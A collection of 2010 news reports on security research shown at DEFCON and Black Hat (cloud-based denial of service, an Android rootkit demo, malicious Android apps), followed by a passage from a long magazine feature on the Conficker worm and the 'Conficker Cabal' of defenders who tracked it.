LAS VEGAS, NEVADA -- DEFCON 2010 -- With the help of the cloud, taking down small and midsize companies' networks is easy, two consultants told attendees here last week.

With a credit card and e-mail address, security consultants David Bryan of Trustwave and Michael Anderson of NetSPI created a handful of virtual server instances on Amazon's EC2 and used a homemade program to attack the network of a client -- a small business that wanted its connectivity tested.

With only three servers -- although they eventually scaled up to 10 -- the consultants took the company off the Internet. The price? Six dollars.

"A threat agent could potentially run extortion schemes against a company by attacking for a couple of hours -- and then telling the company that, if you don't pay me, then I will attack you again," Bryan said.

It's surprising how easy it is to block a company's lifeblood connection to the Internet, the consultants said. To set up an account on Amazon EC2, there are no special bandwidth agreements or detection of servers taking malicious actions, they claimed. Moreover, complaints to Amazon by the client apparently went unanswered.

"We never got a response from Amazon," Anderson said. "We haven't gotten a call; we never got an email."

Amazon could not comment on the consultants' specific claims, but stressed that the company does have a rigorous response process.

"We do have a process for both detecting and responding to reports of abuse," Amazon spokeswoman Kay Kinton said in an email response. "We take all claims of misuse of our services very seriously and investigate each one. When we find misuse, we take action quickly and shut it down."

Small and midsize businesses should focus on basic strategies to defend themselves against cloud-based denial-of-service attacks, experts say. While cloud services are a new way to deliver attacks, the steps needed to defend a business' network and keep it connected are no different than those used to defend against run-of-the-mill packet floods.

First, employees responsible for a business's IT should have a DoS mitigation strategy and test it. An example of how not to do it: The target of the consultants' attack, a small financial institution, had defensive hardware in place, but had the threshold bandwidth set way too high. The attack failed to trigger defensive measures, but the bandwidth was still enough to take down the network, Bryan said.

"You have to make sure to tune your defenses," he said.

Clear responsibilities in the event of an attack are also key, the consultants said. Once attacked, the client's employees became angry with each other and debated who was responsible for responding.

"In the event of an attack or incident, you cannot be adversarial," Bryan said. "Information sharing is key."

Most cybercriminals use botnets to conduct denial-of-service attacks on their targets. Many botnets can be rented, or a subset of machines leased, essentially giving would-be attackers a criminal "cloud" from which to buy services.

But renting server time from a legitimate cloud service is cheaper and can be more effective, according to Bryan and Anderson. Because the traffic comes from Amazon's Internet space, it can be harder to filter. And scaling the attack up is as easy as instantiating a new virtual server. Moreover, many cloud services -- especially infrastructure-as-a-service clouds -- appear to respond slowly to abuse.

"It's essentially a town without a sheriff," Bryan said.

Amazon refuted those assertions, saying that dealing with attacking servers is much easier since it can identify them and shut them down.

"One thing I'd point out is that abusers who choose to run their software in an environment like Amazon EC2 make it easier for us to access and disable their software," Amazon's Kinton says. "This is a significant improvement over the Internet as a whole, where abusive hosts can be inaccessible and run unabated for long periods of time."

The two consultants created a prototype attack tool, called Thunder Clap, that uses cloud-based services to send a flood of packets toward the target company's network. The software can be controlled directly or through a command left on a social network, the researchers said.

The consultants recommended that providers that offer easy-to-configure cloud services -- Amazon, Google, Microsoft and Rackspace -- should be more responsive to complaints and more aware of the attack potential of their networks.

"If we complain loudly enough, maybe they will become more responsive," Anderson said.

Source: http://www.darkreading.com

At the DEFCON hacking conference, which ended yesterday, IT security researchers Nicholas Percoco and Christian Papathanasiou demonstrated what they claim is the first rootkit for Android. Their aim was to show how slight the obstacles to the development of a such a rootkit are and how powerful the result can be. Android is Linux-based and desktop Linux rootkits are nothing out of the ordinary. The demo rootkit, dubbed "Mindtrick", is a Loadable Kernel Module (LKM) and can conceal itself from other processes. The demo was included in a DVD given to DEFCON delegates.

The rootkit can gain access to Android devices, either through using unpatched vulnerabilities, or by pretending to be a legitimate app. Two other researchers recently showed that it's possible to spread infected apps to thousands of devices. Once installed, the rootkit is activated by calling the infected mobile from a specific number. It then establishes a connection to the attacker's computer, which allows the phone to be controlled remotely. As the researchers demonstrated in their talk, this gives the attacker access to the Android phone's SQLite database, allowing them to view, for example, a victim's texts or contacts.

It's also possible to remotely read the device's current GPS coordinates and to make outgoing calls without this being shown on the display. Criminals could make use of the latter by running up costs for expensive sex lines which they in turn operate. According to the researchers, current anti-virus software for Android does not (yet) detect the rootkit.

It is not clear whether Google would be able to disarm such a module using its remote delete function – the deletion process applies to the application level, not the kernel level. According to Percoco, the easiest way to protect against infection via a Loadable Kernel Module would be for smartphone makers to only allow modules digitally signed by the maker. The HTC device used for the demonstration clearly doesn't have this kind of check.

See also:

• Google uses remote delete to remove Android apps from smartphones

Source: http://www.h-online.com

Network World - LAS VEGAS -- Once thought to be unhackable, the Android phone is anything but, according to researchers presenting at Black Hat 2010.

FBI details worst social networking cyber crime problemsNot only has malicious software cloaked in a wallpaper application stolen personal information from infected phones and sent it to a Web site in China, but researchers from Lookout Mobile Security have found a way to take the phones over completely - including top-of-the-line models hawked by major wireless carriers.

In one presentation, Lookout's CEO John Herring said the Jackeey Wallpaper app, which has been downloaded millions of times, can gather passwords, browser history, the subscriber ID and SIM card numbers and text messages.

In a separate presentation, researchers said top-of-the-line Android phones used by Sprint and Verizon can be taken over completely by attacking known flaws in the Linux operating system that underpins Android, researchers reported at Black Hat 2010. "It gives you root control, and you can do anything you want to do" with the phone, says Anthony Lineberry, a researcher for Lookout Mobile Security.

The company says Android's reputation for security may be exaggerated. "It survived the recent pwn2own slay fest unscathed, but this does not mean it is safe by any means," the company said in describing Lineberry's talk.

The best way to distribute malware that could exploit the flaw - known as CVE-2009 1185 - is via Android applications that customers might acquire free or buy from the Android Market. Installing the booby-trapped application would give root control of the device, Lineberry says. "Root is kind of God mode in the context of Linux. Once you have that, you have pretty much any system privilege."

CVE-2009 1185 has been known for more than a year and can be patched, but so far the carriers have not issued patches, Lineberry says. The root-control exploit has been successfully carried out in Lookout labs on EVO 4G (Sprint), Droid X (Verizon), and Droid Incredible (Verizon) as well as older models G1 and Hero, he says.

But root control is unnecessary in order to carry out the type of attack executed by Jackeey Wallpaper, according to another Lookout researcher, Tim Wyatt. Applications require permissions in order to access features of the phone, and these permissions can be exploited. So, for instance, an application that tells the customer the nearest Chinese restaurant would need access to the phones GPS capabilities.

When selling applications, developers must list all the permissions the application requires to work, and the customer must sign off on allowing those permissions. An application that sorts SMS messages but requires Internet access may seem suspicious, and customers might bail out of buying the application.

But some permissions sound innocuous, Wyatt says. Customers might not know what the permission "Import Android log" means, but approve an application that requires it because the name of the permission doesn't sound threatening. But the logs can reveal browsing histories, passwords, phone numbers and a wealth of other data, he says.

Malicious applications with Internet permissions can be crafted to send the data in the background or display innocuous Web sites to mask where the data is being sent, Wyatt says.

The best course for users is to beware the applications they buy and if they are suspicious, not to download the apps, Lineberry says.

Lookout has carried out a study it calls the App Genome project that examined Android and iPhone applications for what permissions they have and what malicious activity they might carry out with the set of permissions they have. An application might use the permissions legitimately, but in the hands of a hacker could cause mischief, the company says.

Part of the permission system in Android allows applications to tap each other's resources, so an application without permission to access the Internet might have access to an application that does and so use the Internet anyway, the researchers say.

Source: www.computerworld.com

When the Conficker computer “worm” was unleashed on the world in November 2008, cyber-security experts didn’t know what to make of it. It infiltrated millions of computers around the globe. It constantly checks in with its unknown creators. It uses an encryption code so sophisticated that only a very few people could have deployed it. For the first time ever, the cyber-security elites of the world have joined forces in a high-tech game of cops and robbers, trying to find Conficker’s creators and defeat them. The cops are failing. And now the worm lies there, waiting …

By Mark Bowden

Image credit: Alex Ostroy

The first surprising thing about the worm that landed in Philip Porras’s digital petri dish 18 months ago was how fast it grew.

He first spotted it on Thursday, November 20, 2008. Computer-security experts around the world who didn’t take notice of it that first day soon did. Porras is part of a loose community of high-level geeks who guard computer systems and monitor the health of the Internet by maintaining “honeypots,” unprotected computers irresistible to “malware,” or malicious software. A honeypot is either a real computer or a virtual one within a larger computer designed to snare malware. There are also “honeynets,” which are networks of honeypots. A worm is a cunningly efficient little packet of data in computer code, designed to slip inside a computer and set up shop without attracting attention, and to do what this one was so good at: replicate itself.

Most of what honeypots snare is routine, the viral annoyances that have bedeviled computer-users everywhere for the past 15 years or so, illustrating the principle that any new tool, no matter how useful to humankind, will eventually be used for harm. Viruses are responsible for such things as the spamming of your inbox with penis-enlargement come-ons or million-dollar investment opportunities in Nigeria. Some malware is designed to damage or destroy your computer, so once you get the infection, you quickly know it. More-sophisticated computer viruses, like the most successful biological viruses, and like this new worm, are designed for stealth. Only the most technically capable and vigilant computer-operators would ever notice that one had checked in.

Porras, who operates a large honeynet for SRI International in Menlo Park, California, noted the initial infection, and then an immediate reinfection. Then another and another and another. The worm, once nestled inside a computer, began automatically scanning for new computers to invade, so it spread exponentially. It exploited a flaw in Microsoft Windows, particularly Windows 2000, Windows XP, and Windows Server 2003—some of the most common operating systems in the world—so it readily found new hosts. As the volume increased, the rate of repeat infections in Porras’s honeynet accelerated. Within hours, duplicates of the worm were crowding in so rapidly that they began to push all the other malware, the ordinary daily fare, out of the way. If the typical inflow is like a stream from a faucet, this new strain seemed shot out of a fire hose. It came from computer addresses all over the world. Soon Porras began to hear from others in his field who were seeing the same thing. Given the instant and omnidirectional nature of the Internet, no one could tell where the worm had originated. Overnight, it was everywhere. And on closer inspection, it became clear that voracity was just the first of its remarkable traits.

Various labs assigned names to the worm. It was dubbed “Downadup” and “Kido,” but the name that stuck was “Conficker,” which it was given after it tried to contact a fake security Web site, trafficconverter.biz. Microsoft security programmers shuffled the letters and came up with Conficker, which stuck partly because ficker is German slang for “motherfucker,” and the worm was certainly that. At the same time that Conficker was spewing into honeypots, it was quietly slipping into personal computers worldwide—an estimated 500,000 in the first month.

Why? What was its purpose? What was it telling all those computers to do?

Imagine your computer to be a big spaceship, like the starship Enterprise on Star Trek. The ship is so complex and sophisticated that even an experienced commander like Captain James T. Kirk has only a general sense of how every facet of it works. From his wide swivel chair on the bridge, he can order it to fly, maneuver, and fight, but he cannot fully comprehend all its inner workings. The ship contains many complex, interrelated systems, each with its own function and history—systems for, say, guidance, maneuvers, power, air and water, communications, temperature control, weapons, defensive measures, etc. Each system has its own operator, performing routine maintenance, exchanging information, making fine adjustments, keeping it running or ready. When idling or cruising, the ship essentially runs itself without a word from Captain Kirk. It obeys when he issues a command, and then returns to its latent mode, busily doing its own thing until the next time it is needed.

Now imagine a clever invader, an enemy infiltrator, who does understand the inner workings of the ship. He knows it well enough to find a portal with a broken lock overlooked by the ship’s otherwise vigilant defenses—like, say, a flaw in Microsoft’s operating platform. So no one notices when he slips in. He trips no alarm, and then, to prevent another clever invader from exploiting the same weakness, he repairs the broken lock and seals the portal shut behind him. He improves the ship’s defenses. Ensconced securely inside, he silently sets himself up as the ship’s alternate commander. He enlists the various operating functions of the ship to do his bidding, careful to avoid tripping any alarms. Captain Kirk is still up on the bridge in his swivel chair with the magnificent instrument arrays, unaware that he now has a rival in the depths of his ship. The Enterprise continues to perform as it always has. Meanwhile, the invader begins surreptitiously communicating with his own distant commander, letting him know that he is in position and ready, waiting for instructions.

And now imagine a vast fleet, in which the Enterprise is only one ship among millions, all of them infiltrated in exactly the same way, each ship with its hidden pilot, ever alert to an outside command. In the real world, this infiltrated fleet is called a “botnet,” a network of infected, “robot” computers. The first job of a worm like Conficker is to infect and link together as many computers as possible—the phenomenon witnessed by Porras and other security geeks in their honeypots. Thousands of botnets exist, most of them relatively small—a few thousand or a few tens of thousands of infected computers. More than a billion computers are in use around the world, and by some estimates, a fourth of them have been surreptitiously linked to a botnet. But few botnets approach the size and menace of the one created by Conficker, which has stealthily linked between 6 million and 7 million computers.

Once created, botnets are valuable tools for criminal enterprise. Among other things, they can be used to efficiently distribute malware, to steal private information from otherwise secure Web sites or computers, to assist in fraudulent schemes, or to launch denial-of-service attacks—overwhelming a target computer with a flood of requests for response. The creator of an effective botnet, one with a wide range and the staying power to defeat security measures, can use it himself for one of the above scams, or he can sell or lease it to people who specialize in exploiting botnets. (Botnets can be bought or leased in underground markets online.)

Beyond criminal enterprise, botnets are also potentially dangerous weapons. If the right order were given, and all these computers worked together in one concerted effort, a botnet with that much computing power could crack many codes, break into and plunder just about any protected database in the world, and potentially hobble or even destroy almost any computer network, including those that make up a country’s vital modern infrastructure: systems that control banking, telephones, energy flow, air traffic, health-care information—even the Internet itself.

The key word there is could, because so far Conficker has done none of those things. It has been activated only once, to perform a relatively mundane spamming operation—enough to demonstrate that it is not benign. No one knows who created it. No one yet fully understands how it works. No one knows how to stop it or kill it. And no one even knows for sure why it exists.

If yours is one of the infected machines, you are like Captain Kirk, seemingly in full command of your ship, unaware that you have a hidden rival, or that you are part of this vast robot fleet. The worm inside your machine is not idle. It is stealthily running, issuing small maintenance commands, working to protect itself from being discovered and removed, biding its time, and periodically checking in with its command-and-control center. Conficker has taken over a large part of our digital world, and so far most people haven’t even noticed.

The struggle against this remarkable worm is a sort of chess match unfolding in the esoteric world of computer security. It pits the cleverest attackers in the world, the bad guys, against the cleverest defenders in the world, the good guys (who have been dubbed the “Conficker Cabal”). It has prompted the first truly concerted global effort to kill a computer virus, extraordinary feats of international cooperation, and the deployment of state-of-the-art decryption techniques—moves and countermoves at the highest level of programming. The good guys have gone to unprecedented lengths, and have had successes beyond anything they would have thought possible when they started. But a year and a half into the battle, here’s the bottom line:

The worm is winning.

A Digital Sam Spade

Twenty years ago, computers were bedeviled by hackers. These were savvy outlaws who used their deep knowledge of operating systems to invade, steal, and destroy, or sometimes just to tap into secure facilities and show off their skills. Hackers became heroes to a generation of teenagers, and had all sorts of motives, but their most distinctive trait was a tendency to show off.

Some had truly malicious intent. In his 1989 best seller, The Cuckoo’s Egg, Cliff Stoll told the story of his stubborn, virtually single-handed hunt for an elusive hacker in Germany who was using Stoll’s computer system at the Lawrence Berkeley National Laboratory as a portal to Defense Department computers. For many people, Stoll’s book was the introduction to the netherworld of rarefied gamesmanship that defines computer security. Stoll’s hacker never penetrated the most secret corners of the national-security net, and even relatively serious breaches like the one Stoll described were more nuisance than threat. But the individual hacker working as a spy or vandal has evolved into something more organized and menacing.

Andre’ M. DiMino, a computer sleuth who is part of the Conficker Cabal, is considered one of the world’s foremost authorities on botnets. He stumbled into his avocation on a Monday morning a decade ago, when he discovered that over the weekend, someone had broken into the computer system he was administering for a small company in New Jersey. DiMino has an undergraduate degree in electrical engineering with an emphasis in computer science, but he has mostly taught himself up to his present level of expertise, which is extreme. At 45, he is a slender, affable idealist who keeps a small array of computers in an upstairs bedroom. When I stopped by to talk to him, he baked me pizza. His day job is doing computer forensics for law enforcement in Bergen County, New Jersey, but he has a kind of alter ego as what he calls a “botnet hunter.”

Back when he discovered the weekend break-in, DiMino assumed at first that it was the work of a hacker, a vandal, or possibly a former employee, only to discover, based on an analysis of the IP (Internet Protocol) addresses of the incoming data, that his little computer network had been invaded by someone from Turkey or Ukraine. What would someone halfway around the planet want with the computer system of a small business-management firm in a New Jersey office park? Apparently, judging by what he found, his invader was in the business of selling pirated software, movies, and music. Needing large amounts of digital storage space to hide stolen inventory, the culprit seemed to have conducted an automated search over the Internet, looking worldwide for vulnerable systems with large amounts of unused disc space—DiMino equates it to walking around rattling doorknobs, looking for one door left unlocked. DiMino’s system fit the bill, so the crooks had dumped a huge bloc of data onto his discs. He erased the stash and locked the door that had allowed the pirates in. As far as the company was concerned, that solved the problem. No harm done. No need to call the police or investigate further.

But DiMino was intrigued. He reviewed the server logs for previous weeks and saw that this successful invasion was one of many such efforts. Other attackers had been rattling the doors of his network, looking for vulnerabilities. If there were bad guys actively exploiting other people’s computers all over the world, designing sophisticated programs to exploit weaknesses … how cool was that? And who was trying to stop them?

DiMino set about educating himself on the fine points of this obscure battle of wits. He eventually co-founded the Shadowserver Foundation, a nonprofit partnership of defense-minded geeks at war with malware, effectively transforming himself into a digital Sam Spade—indeed, the graphic atop Shadowserver’s home page features a Dashiell Hammett–style detective emerging from shadow.

Both sides in this cyberwar have become astonishingly sophisticated, operating at the cutting edge of programming theory and cryptography. Both understand the limits of security methodology, the one side working to broaden its reach, the other working to surpass it. Because malware has been automated, the good guys usually can only guess at who they are up against.

Trojans, Viruses, and Worms

Rodney Joffe heads the cabal that has been battling Conficker. He is a burly, garrulous South African–born American who serves as senior vice president and chief technologist for Neustar, a company that provides trunk-line service for competing cell-phone companies around the world. Joffe’s interest in stopping the worm did not stem just from his outrage and sense of justice. His concern for Neustar’s operation is professional, and illustrative.

The company runs a huge local-number-portability database. Almost every phone call in North America, before it’s completed, must ask Neustar where to go. Back in the old days, when the phone company was a monopoly, telecommunications were relatively simple. You could figure out where a phone call was going, right down to the building where the target phone would ring, just by looking at the number. Today we have competing telephone companies, and cell phones, and a person’s telephone number is no longer necessarily tied to a geographic location. In this more complex world, someone needs to keep track of every single phone number, and know where to route calls so they end up in the right place. Neustar performs this service for telephone calls, and is one of many registries that oversee high-level Internet domains. It is, in Joffe’s words, “the map.”

“If I disappear, there’s no map,” he says. “So if you take us down, whole countries can actually disappear from the grid. They’re connected, but no one can find their way there, because the map’s disappeared.”

A botnet like Conficker could theoretically be used to shut down Neustar’s system. So Joffe helped form the Conficker Cabal. He scoffed when he read in late 2009 that the Obama administration’s Department of Homeland Security planned to hire “a thousand” computer-security experts over the next three years. “There aren’t more than a few hundred people in the world who understand this stuff.”

Most of us use the word virus to describe all malware, but in geekspeak, it means something more specific. There are three types of the stuff: Trojans, viruses, and worms. A Trojan is a piece of software that works like a Trojan horse, masquerading as one thing to get inside a computer, and then attacking. A virus attacks the host computer after slipping in through a hole in its operating system. It depends on the computer-operator—you—doing something stupid to activate it, like opening an attachment to an e-mail that appears innocuous, or clicking on an enticing link. A worm works like a virus, exploiting flaws in operating systems, but it doesn’t attack once it breaks in. It generally doesn’t have a malicious payload. Exactly like the most-sophisticated viruses in the biological world, it does not cripple or kill its host. It is primarily designed to spread. The instructions that will put a worm like Conficker to work are not embedded in its code; they will be delivered later, from a remote command center.

In the old days, when your computer got infected, it slowed down because your commands had to compete for processing with viral invaders. You knew something was wrong because the machine took 10 times longer to boot up, or there was a delay between command and response. You began to get annoying pop-ups on your screen directing you to download supposedly remedial software. Programs would freeze. In this sense, the old malware was like the Ebola virus, a very scary strain that messily kills nearly everyone it infects—which is another way of saying that it is grossly ineffective, because it burns out the very host organisms it needs to survive. The miscreants who created computer viruses years ago learned that malware that announces itself in these ways doesn’t last.

So today’s malware produces no pop-ups, no slowdowns. A worm is especially quiet, since all it does, at least initially, is spread. Conficker stealthily sets up shop without making a ripple, and—other than calling home periodically for instructions—just waits. Its regular messages to its command center amount to only a couple hundred bytes of data, which is not enough to even light up the little bulb that flashes when a computer hard drive is at work.

After Phil Porras and others began snaring Conficker in increasing numbers, they began dissecting it. The worm itself was exquisite. It consisted of only a few hundred lines of code, no more than 35 kilobytes—slightly smaller than a 2,000-word document. In comparison, the average home computer today has anywhere from 40 to 200 gigabytes of storage. Unless you were looking for it, unless you knew how to look for it, you would never see it. Conficker drifts in like a mote.

It exploited a specific hole, Port 445, in the Microsoft operating systems, a vulnerability that the manufacturer had tried to repair just weeks earlier. Ports are designated “listening” points in a system, designed to transmit and receive particular kinds of data. There are many of them, more than 65,000, because an operating system consists of layer upon layer of functions. A firewall is a security program that guards these ports, controlling the flow of data in and out. Some ports, like the one that handles e-mail, are heavily trafficked. Most are not; they listen for updates and instructions that deal with a narrow and specific function, usually routine procedures that never rise to the notice of computer-users. Only certain very specific kinds of data can flow through ports, and then only with the appropriate codes. Windows opens Port 445 by default to perform tasks like issuing instructions for print-sharing or file-sharing. Late in the summer of 2008, Microsoft learned that even a system protected by a firewall was vulnerable at Port 445 if print-sharing and file-sharing were enabled (which they were on many computers). In other words, even a well-protected computer had a hole. On October 23, 2008, the company issued a rare “critical security bulletin” (MS08-067) with a patch to repair that hole. A specially crafted “remote procedure call” could allow the port to be used by a remote operator, the security bulletin warned, and “an attacker could exploit this vulnerability without authentication to run arbitrary code.” The patch Microsoft offered theoretically slammed the door on a worm like Conficker almost a month before it appeared.

Theoretically.

In fact, the bulletin itself may have inspired the creation of Conficker. Many, many computer-operators worldwide—you know who you are—fail to diligently heed security updates. And the patches are issued only to computers with validated software installations; millions of computers run on bootlegged operating systems, which have never been validated. Microsoft issues its updates on the second Tuesday of every month. Every geek in the world knows this; it’s called “Patch Tuesday.” The company employs some of the best programmers in the world to stay one step ahead of the bad guys. If everyone applied the new patches promptly, Windows would be nigh impregnable. But because so many people fail to apply the patches promptly, and because so many machines run on illegitimate Windows systems, Patch Tuesday has become part of Microsoft’s problem. The company points out its own vulnerabilities, which is like a general responsible for defending a fort making a public announcement—“The back door to the supply shed in the southeast corner of the garrison has a broken lock; here’s how to fix it.” When there is only one fort, and it is well policed, the lock is fixed and the vulnerability disappears. But when you are defending millions of forts, and a goodly number of the people responsible for their security snooze right through Patch Tuesday, the security bulletin doesn’t just invite attack, it provides a map! Twenty-eight days after the MS08-067 security bulletin appeared, Conficker started worming its way into unpatched computers.

The Cabal’s Sandboxes

Conficker’s rate of replication got everyone’s attention, so a loose-knit gaggle of geeky “good guys,” including Porras, Joffe, and DiMino, began picking the worm apart. The online-security community consists of software manufacturers like Microsoft, companies like Symantec that sell security packages to computer owners, large telecommunication registries like Neustar and VeriSign, nonprofit research centers like SRI International, and botnet hunters like Shadowserver. In addition to maintaining honeypots, these security experts operate “sandboxes”—isolated computers (or, again, virtual computers inside larger ones) where they can place a piece of malware, turn it on, and watch it run. In other words, where they can play with it.

They all started playing with Conficker, comparing notes on what they found, and brainstorming ways to defeat it. That’s when someone dubbed the group the “Conficker Cabal,” and the name stuck, despite discomfort with the darker implications of the word. Here are some of the things the cabal discovered about the worm in those first few weeks:

• It patched the hole it came through at Port 445, making sure it would not have to compete with other worms. This was smart, because surely other hackers had seen security bulletin MS08-067.
•It tried to prevent communication with security providers (many computer-users subscribe to commercial services that regularly update antivirus software).
•When it started, if the IP address of the infected computer was Ukrainian, the worm self-destructed. When in attack mode, searching for other computers to infect, it skipped any with a Ukrainian IP address.
•It disabled the Windows “system restore” points, a useful tool that allows users with little expertise to simply reset an infected machine to a date prior to its infection. (System restore is one of the easiest ways to debug a machine.)

All of these things were clever. They indicated that Conficker’s creator was up on all the latest tricks. But the main feature that intrigued the cabal was the way the worm called home. This is, of course, what worms designed to create botnets do. They settle in and periodically contact a command center to receive instructions. Botnet hunters like DiMino regularly wipe out whole malicious networks by deciphering the domain name of the command center and then getting it blocked. In the old days, this was easier because malware pointed to only a few IP addresses, which could be blocked by hosting providers and Internet service providers. The newer worms like Conficker bumped the game up to a higher level, generating domain names that involve many providers and a wide range of IP addresses, and that security experts can block only by contacting Internet registries—organizations that manage the domain registrations for their realm. But Conficker did not call home to a fixed address.

Shortly after it was discovered, the worm began performing a new operation: generating a list of domain names seemingly at random, 250 a day across five top-level domains (top-level domains are defined by the final letters in a Web address, such as .com or .edu or .uk). The worm would then go down the list until it hit upon the one connected to its remote controller’s server. All Conficker’s controller had to do was register one of the addresses, which can be done for a fee of about $10, and await the worm’s regular calls. If he wished, he could issue instructions. It was as if the boss of a crime family told his henchmen to check in daily by turning to the bottom of a certain page in each day’s Racing Form, where there would be a list of potential numbers. They would then call each number until the boss picked up. So it was not apparent from day to day where the worm would call home.

With the Racing Form trick, if you were a cop and were tipped off where to look, you might arrange with the paper’s publisher to see the page before it was printed, and thus be one step ahead of the henchmen and their boss. To defeat Conficker, the geeks would have to figure out in advance what the numbers (or, in this case, domain names) would be, and then hustle to either buy up or contact every one, block it, or cajole whoever owned it to cooperate before the worm “made the call.”

Michael Ligh, a young Brooklyn researcher employed by the computer-security company iDefense, is one of several people who went to work unraveling Conficker’s methods. Ligh and others had seen algorithms for random-domain-name generation before, and most were keyed to the infected computer’s clock. If new places to call home must be generated every day, or every few hours, then the worm needs to know when to perform the procedure. So the malware simply checks the time on its host computer. This provided the good guys with a tool to defeat it. They turned the clock forward on their sandbox computer, forcing their captured strain of the worm to spit out all the domain names it would generate for as long into the future as they cared to look. It was like stealing the teacher’s edition of a classroom textbook, the one with all the answers to the quizzes and tests printed in the back. Once you knew all the places the malware would be calling, you could cordon off those sites in advance, effectively stranding the worm.

Conficker had an answer for that. Instead of using the infected computer’s clock, the worm set its schedule by the time on popular corporate home pages, like Yahoo, Google, or Microsoft’s own msn.com.

“That was interesting,” Ligh said. “There was no way we could turn the clock forward on Google’s home page.”

So there was no easy way to predict the list of domain names in advance. But there was a way. The first step was to set up a proxy server to, in effect, intercept the time update from the big corporate Web site before it got back to the worm, alter the information, and then send it on. You could then tell the worm it was a date sometime in the future, and the worm would spit out the domain names for that date. This was a tedious way to proceed, since you could generate only one set of new domain names at a time. So Ligh and other researchers reverse-engineered the worm’s algorithm, extracted the time-update function, and wedded it to a piece of code they could control. They instructed their copy to generate the future lists in advance. They could then buy up or block all the sites, and direct all the worm’s communications into a “sinkhole,” a dead-end location where calls go unanswered. Conficker’s creators had deliberately made the task so onerous and expensive that no one would go to the trouble of blocking all possible command centers.

Or so they thought. The cabal, through a determined and unprecedented effort, did manage to cordon off the worm. By the end of 2008, Conficker had infected an estimated 1.5 million machines worldwide, but it was on its way to full containment. In the great chess match, the good guys had called “Check!”

Then the worm turned.

MD-6

On December 29, 2008, a new version of Conficker showed up, and if the geeks had been intrigued with the original version, they now experienced something more akin to respect … mingled with fear.

One of the early theories about the worm was that it had slipped out of a computer-science lab, the product of some fooling-around by a sophisticated graduate student or group of students. They had loosed it on the world inadvertently, or maybe on purpose as a prank or experiment without realizing how effective it would be. This hypothesis appealed to optimists.

The new version of the worm, Conficker B, exploded the benevolent-accident theory. It was clear that the worm’s creator had been watching every move the good guys made, and was adjusting accordingly. He didn’t care that the good guys could predict its upcoming lists of domain names. He just rejiggered the worm to spread the new lists out over eight top-level domains instead of five, making the job of blocking them far more difficult. The worm had no trouble contacting all of these locations. If it received no command from one, it simply tried the next one on its list. Conficker B could go on like this for months, even years. It had to find its controller only once to receive instructions.

“That’s a high number,” Rodney Joffe, of Neustar, told me. “The cops will get sick and tired of knocking on 250 doors a day and finding there’s no one there. And if I’m the chief bad guy, all I have to do is be behind one of those doors on one of those days.”

There were other improvements to Conficker. Among them: besides shutting down whatever security system was installed on the computer it invaded, and preventing it from communicating with computer-security Web sites, it stopped the computer from connecting with Microsoft to perform Windows updates. So even though Microsoft was providing patches, the infected machines could not get to them. In addition, it modified the computer’s bandwidth settings to increase speed and propagate itself faster; and it began to spread itself in different ways, including via USB drives. This last innovation meant that even “closed” computer networks, those with no connection to the Internet, were vulnerable, since users who cannot readily transmit files from point to point via the Web often store and transport them on small USB drives. If one of those USB drives, or a CD, was plugged into an infected computer, it could deliver the worm to an entire closed network.

All of this was impressive—but something else stopped researchers cold. Analysts with Conficker B isolated in their sandboxes could watch it regularly call home and receive a return message. The exchange was in code, and not just any code.

Breaking codes used to be the province of clever puzzle masters, who during World War II devised encryption and code-breaking methods so difficult that operators needed machines to do the work. Computers today can perform so many calculations so fast that, theoretically at least, no cipher is too difficult to crack. One simply applies what computer scientists call “brute force”: trying every possible combination systematically until the secret is revealed. The game is to make a cipher so difficult that the amount of computing power needed to break it renders the effort pointless—the “thief” would have to spend more to obtain the prize than the prize is worth. In his 1999 history of code-making and -breaking, The Code Book, Simon Singh wrote: “It is now routine to encrypt a message [so securely] that all the computers on the planet would need longer than the age of the universe to break the cipher.”

The basis for the highest-level modern ciphers is a public-key encryption method invented in 1977 by three researchers at MIT: Ron Rivest (the primary author), Adi Shamir, and Leonard Adleman. In the more than 30 years since it was devised, the method has been improved several times. The National Institute of Standards and Technology sets the Federal Information Processing Standard, which defines the cryptography algorithms that government agencies must use to protect communications. Because it is the most sophisticated oversight effort of its kind, the standard is determined by an international competition among the world’s top cryptologists, with the winning entry becoming by default the worldwide standard. The current highest-level standard is labeled SHA-2 (Secure Hash Algorithm–2). Both this and the first SHA standard are versions of Rivest’s method. The international competition to upgrade SHA-2 has been under way for several years and is tentatively scheduled to conclude in 2013, at which point the new standard will become SHA-3.

Rivest’s proposal for the new standard, MD-6 (Message Digest–6), was submitted in the fall of 2008, about a month before Conficker first appeared, and began undergoing rigorous peer review—the very small community of high-level cryptographers worldwide began testing it for flaws.

Needless to say, this is a very arcane game. The entries are comprehensible to very few people. According to Rodney Joffe, “Unless you’re a subject-matter expert actively involved in crypto-algorithms, you didn’t even know that MD-6 existed. It wasn’t like it was put in The New York Times.”

So when the new version of Conficker appeared, and its new method of encrypting its communication employed MD-6, Rivest’s proposal for SHA-3, the cabal’s collective mind was blown.

“It was clear that these guys were not your average high-school kids or hackers or predominantly lazy,” Joffe told me. “They were making use of some very, very sophisticated techniques.

“Not only are we not dealing with amateurs, we are possibly dealing with people who are superior to all of our skills in crypto,” he said. “If there’s a surgeon out there who’s the world’s foremost expert on treating retinitis pigmentosa, he doesn’t do bunions. The guy who is the world expert on bunions—and, let’s say, bunions on the third digit of Anglo-American males between the ages of 35 and 40, that are different than anything else—he doesn’t do surgery for retinitis pigmentosa. The knowledge it took to employ Rivest’s proposal for SHA-3 demonstrated a similarly high level of specialization. We found an equivalent of three or four of those in the code—different parts of it.

“Take Windows,” he explained. “The understanding of Windows’ operating system, and how it worked in the kernel, needed that kind of a domain expert, and they had that kind of ability there. And we realized as a community that we were not dealing with something normal. We’re dealing with one of two things: either we’re dealing with incredibly sophisticated cyber criminals, or we’re dealing with a group that was funded by a nation-state. Because this wasn’t the kind of team that you could just assemble by getting your five buddies who play Xbox 360 and saying, ‘Let’s all work together and see what we can do.’”

The plot thickened—it turned out that Rivest’s proposal, MD-6, had a flaw. Cryptologists in the competition had duly gone to work trying to crack the code, and one had succeeded. In early 2009, Rivest quietly withdrew his proposal, corrected it, and resubmitted it. This gave the cabal an opening. If the original Rivest proposal was flawed, then so was the encryption method for Conficker B. If they were able to eavesdrop on communications between Conficker and its mysterious controller, they might be able to figure out who he was, or who they were. How likely was it that the creator of Conficker would know about the flaw discovered in MD-6?

Once again, the good guys had the bad guys in check.

About six weeks later, another new version of the worm appeared.

It employed Rivest’s revised MD-6 proposal.

Game on.

“Our Finest Hour”

